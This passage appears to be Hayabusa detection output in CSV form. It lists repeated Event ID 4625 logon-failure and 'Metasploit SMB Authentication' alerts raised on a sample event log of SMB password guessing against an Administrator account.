Password,User: Administrator : Type: 3 : Workstation: CiUnLFzfXR6rER9B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u1InESrL0ebaRw2z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.668 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IlLAG8gXt9YNeW4H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.757 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uZIWubLvZcDOWHxr : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.757 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FZazp7ZnBrtswAse : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jqK5Vqf0QF4qtg0A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.849 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k3JvFwi9gDNbO6Sj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fBubAOTZMsahNG0Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.932 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KCxrXG3N1IRzDxxM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.981 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e2h9M7o0lS7oC00a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.024 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.074 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: pprfGGVZblL64xC3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.074 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wxgzMKd7eDwzs8WO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.127 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q2RljqAhn0NZhR6O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.238 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rcxQVtjMqnE1wGfr : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.268 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fSRggYsSiJGsGSyV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.321 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yQqfSKOyKLSILPrQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.374 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k7oAI2q6YCu8btlK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.552 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KniVwndqE9aC6cIM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.610 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FgQbvpfuS11matJi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.702 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R9TwJS4B9ZaDD2Ze : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.702 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: IPUuoopOnwlTjlTP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.749 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.806 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9VEyOUuiOi8Q3JBJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.806 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pGGGazMTBBfrppDZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.862 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.919 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NKO4V35Y2qPEB59W : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.919 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WxVdhpR7ZnAluurU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.964 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gZjAZb9bQKZjwL8u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.066 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aKyLX5ChpgBuFEbr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.066 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 49t2xJvH2yHcyHle : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.112 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sg9Z6Pyix2UkMolr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0NN2olYn97ZoYCja : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.210 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.249 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: S98j54bDGsz0k6g9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.249 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XxFEw9s0nnEQGzUN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.284 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wSswFHFSlqcQd47k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.342 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7icutlVIWSLZJszQ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DSwyugYn0n3i5f25 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.440 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RmBaLCUcR7TmixTy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.473 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1oOBz2NQSCdTwa7V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O4tU1LPF5DRW9Vm0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.582 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.633 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SRsSNqPYruWBzp2n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.633 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3JZhBLzt4af1VtCU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.684 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.729 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: dFLZIKSDBvBaWq59 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.729 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: guAG4ZTFMjZAxp1A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.774 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yd04xsSIdiczICeG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.817 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.865 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cx3i1URKPhC6KWI7 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.865 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Npc6IS27HsWP3JA9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.914 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KIBnr0eZ1bHHGokW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.963 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.013 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6gTTrUVjpPU80LlC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.013 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
